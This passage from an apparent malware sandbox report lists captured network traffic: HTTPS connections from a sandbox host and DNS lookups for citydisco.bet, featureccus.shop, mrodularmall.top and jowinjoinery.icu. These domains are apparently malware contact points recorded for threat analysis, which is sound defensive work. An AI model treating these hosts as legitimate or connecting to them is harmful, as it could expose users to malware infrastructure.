                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.856667042 CET49707443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.856720924 CET44349707104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.856800079 CET49707443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.857108116 CET49707443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.857125998 CET44349707104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.857495070 CET44349707104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.857745886 CET49708443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.857778072 CET44349708104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.857832909 CET49708443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.857959032 CET49708443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.857994080 CET44349708104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.858040094 CET49708443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.859209061 CET49709443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.859247923 CET44349709104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.859322071 CET49709443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.859590054 CET49709443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.859605074 CET44349709104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.859965086 CET44349709104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.860272884 CET49710443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.860285044 CET44349710104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.860340118 CET49710443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.860569954 CET49710443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.860582113 CET44349710104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.860920906 CET44349710104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.861192942 CET49711443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.861222982 CET44349711104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.861267090 CET49711443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.861401081 CET49711443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.861429930 CET44349711104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.861475945 CET49711443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.268883944 CET49712443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.268942118 CET44349712104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.269037008 CET49712443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.269376993 CET49712443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.269393921 CET44349712104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.270108938 CET44349712104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.270411968 CET49713443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.270467043 CET44349713104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.270541906 CET49713443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.270768881 CET49713443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.270787954 CET44349713104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.271173000 CET44349713104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.271428108 CET49714443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.271462917 CET44349714104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.271529913 CET49714443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.271656990 CET49714443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.271686077 CET44349714104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.271728992 CET49714443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.272727966 CET49715443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.272772074 CET44349715104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.272847891 CET49715443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.273212910 CET49715443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.273228884 CET44349715104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.273675919 CET44349715104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.273941994 CET49716443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.273956060 CET44349716104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.274018049 CET49716443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.274228096 CET49716443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.274236917 CET44349716104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.274606943 CET44349716104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.274889946 CET49717443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.274930954 CET44349717104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.275176048 CET49717443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.275176048 CET49717443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.275257111 CET44349717104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.275316954 CET49717443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.438453913 CET49718443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.438509941 CET44349718104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.438611984 CET49718443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.439093113 CET49718443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.439106941 CET44349718104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.439759970 CET44349718104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.440205097 CET49719443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.440260887 CET44349719104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.440326929 CET49719443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.440663099 CET49719443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.440685034 CET44349719104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.441092014 CET44349719104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.441422939 CET49720443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.441458941 CET44349720104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.441520929 CET49720443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.441694021 CET49720443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.441724062 CET44349720104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.442570925 CET49720443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.443073988 CET49721443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.443110943 CET44349721104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.443185091 CET49721443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.443470001 CET49721443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.443485022 CET44349721104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.443866014 CET44349721104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.444189072 CET49722443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.444217920 CET44349722104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.444287062 CET49722443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.444577932 CET49722443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.444590092 CET44349722104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.444961071 CET44349722104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.445306063 CET49723443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.445331097 CET44349723104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.445424080 CET49723443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.445593119 CET49723443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.445621014 CET44349723104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.446161985 CET49723443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.624449968 CET49724443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.624509096 CET44349724104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.625087976 CET49724443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.625612974 CET49724443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.625627041 CET44349724104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.626302958 CET44349724104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.626740932 CET49725443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.626786947 CET44349725104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.627171993 CET49725443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.627681971 CET49725443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.627691984 CET44349725104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.628166914 CET44349725104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.628475904 CET49726443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.628520012 CET44349726104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.628639936 CET49726443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.628787041 CET49726443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.628820896 CET44349726104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.629192114 CET49726443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.629935026 CET49727443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.629961014 CET44349727104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.631413937 CET49727443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.631887913 CET49727443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.631900072 CET44349727104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.632390022 CET44349727104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.634964943 CET49728443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.634979963 CET44349728104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.635106087 CET49728443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.635560989 CET49728443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.635570049 CET44349728104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.636064053 CET44349728104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.636379957 CET49729443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.636403084 CET44349729104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.636496067 CET49729443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.636591911 CET49729443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.636616945 CET44349729104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.636670113 CET49729443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:18.609642982 CET49730443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:18.609699965 CET44349730104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:18.609822989 CET49730443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:18.610553980 CET49730443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:18.610570908 CET44349730104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:21.057109118 CET44349730104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:21.057184935 CET49730443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:21.060863018 CET49730443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:21.060873032 CET44349730104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:21.061136961 CET44349730104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:21.073923111 CET49730443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:21.116327047 CET44349730104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:21.959638119 CET44349730104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:21.959665060 CET44349730104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:21.959707975 CET44349730104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:21.959711075 CET49730443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:21.959743977 CET44349730104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:21.959760904 CET49730443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:21.959805965 CET49730443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:22.093195915 CET44349730104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:22.093282938 CET44349730104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:22.093303919 CET49730443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:22.093307972 CET44349730104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:22.093353987 CET49730443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:22.093605995 CET49730443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:22.093633890 CET44349730104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:22.093647957 CET49730443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:22.093653917 CET44349730104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:22.095767021 CET49731443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:22.095814943 CET44349731104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:22.095900059 CET49731443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:22.096218109 CET49731443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:22.096230984 CET44349731104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:23.722058058 CET44349731104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:23.722136021 CET49731443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:23.723597050 CET49731443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:23.723608971 CET44349731104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:23.723879099 CET44349731104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:23.725153923 CET49731443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:23.768325090 CET44349731104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.663995981 CET44349731104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.664032936 CET44349731104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.664050102 CET44349731104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.664158106 CET49731443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.664191961 CET44349731104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.664212942 CET49731443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.664241076 CET49731443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.783854008 CET44349731104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.783914089 CET44349731104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.783943892 CET44349731104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.783946037 CET49731443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.783974886 CET49731443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.784147024 CET49731443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.784223080 CET49731443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.784241915 CET44349731104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.784254074 CET49731443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.784259081 CET44349731104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.831515074 CET49733443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.831558943 CET44349733104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.831685066 CET49733443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.832037926 CET49733443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:24.832053900 CET44349733104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:26.347475052 CET44349733104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:26.347543955 CET49733443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:26.349210978 CET49733443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:26.349227905 CET44349733104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:26.349461079 CET44349733104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:26.351622105 CET49733443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:26.392330885 CET44349733104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.284913063 CET44349733104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.284944057 CET44349733104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.284959078 CET44349733104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.284986973 CET49733443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.285007954 CET44349733104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.285063982 CET49733443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.436830997 CET44349733104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.436862946 CET44349733104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.437020063 CET49733443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.437038898 CET44349733104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.437338114 CET49733443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.451543093 CET44349733104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.451827049 CET49733443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.474948883 CET44349733104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.475038052 CET44349733104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.475085974 CET49733443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.475192070 CET49733443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.475192070 CET49733443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.475224972 CET44349733104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.475256920 CET49733443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.475267887 CET44349733104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.570595026 CET49738443192.168.2.8188.114.96.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.570626974 CET44349738188.114.96.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.570707083 CET49738443192.168.2.8188.114.96.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.571115971 CET49738443192.168.2.8188.114.96.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.571126938 CET44349738188.114.96.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:28.925234079 CET44349738188.114.96.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:28.925364971 CET49738443192.168.2.8188.114.96.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:28.928523064 CET49738443192.168.2.8188.114.96.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:28.928534985 CET44349738188.114.96.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:28.928788900 CET44349738188.114.96.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:28.937726021 CET49738443192.168.2.8188.114.96.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:28.937750101 CET49738443192.168.2.8188.114.96.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:28.937805891 CET44349738188.114.96.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:29.861478090 CET44349738188.114.96.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:29.865659952 CET44349738188.114.96.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:29.868398905 CET49738443192.168.2.8188.114.96.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:29.868398905 CET49738443192.168.2.8188.114.96.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:29.868999958 CET49738443192.168.2.8188.114.96.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:29.869019032 CET44349738188.114.96.3192.168.2.8

                                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                          Mar 13, 2025 14:58:06.740349054 CET6303653192.168.2.81.1.1.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:06.759413004 CET53630361.1.1.1192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.741792917 CET5684453192.168.2.81.1.1.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.751461029 CET53568441.1.1.1192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.752727985 CET6495053192.168.2.81.1.1.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.544230938 CET53649501.1.1.1192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.550553083 CET5420953192.168.2.81.1.1.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.570880890 CET53542091.1.1.1192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.575683117 CET6353553192.168.2.81.1.1.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.763010025 CET53635351.1.1.1192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.768379927 CET5209453192.168.2.81.1.1.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.780987024 CET53520941.1.1.1192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.785901070 CET5793453192.168.2.81.1.1.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.801736116 CET53579341.1.1.1192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.806643009 CET6036653192.168.2.81.1.1.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.820607901 CET53603661.1.1.1192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.833431959 CET6536753192.168.2.81.1.1.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.845788956 CET53653671.1.1.1192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.847145081 CET4962853192.168.2.81.1.1.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.854360104 CET53496281.1.1.1192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.522490978 CET5734453192.168.2.81.1.1.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.569567919 CET53573441.1.1.1192.168.2.8

                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                          Mar 13, 2025 14:58:06.740349054 CET192.168.2.81.1.1.10x7f7bStandard query (0)citydisco.betA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.741792917 CET192.168.2.81.1.1.10xf2f8Standard query (0)featureccus.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.752727985 CET192.168.2.81.1.1.10x9072Standard query (0)mrodularmall.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.550553083 CET192.168.2.81.1.1.10x25d9Standard query (0)jowinjoinery.icuA (IP address)IN (0x0001)false
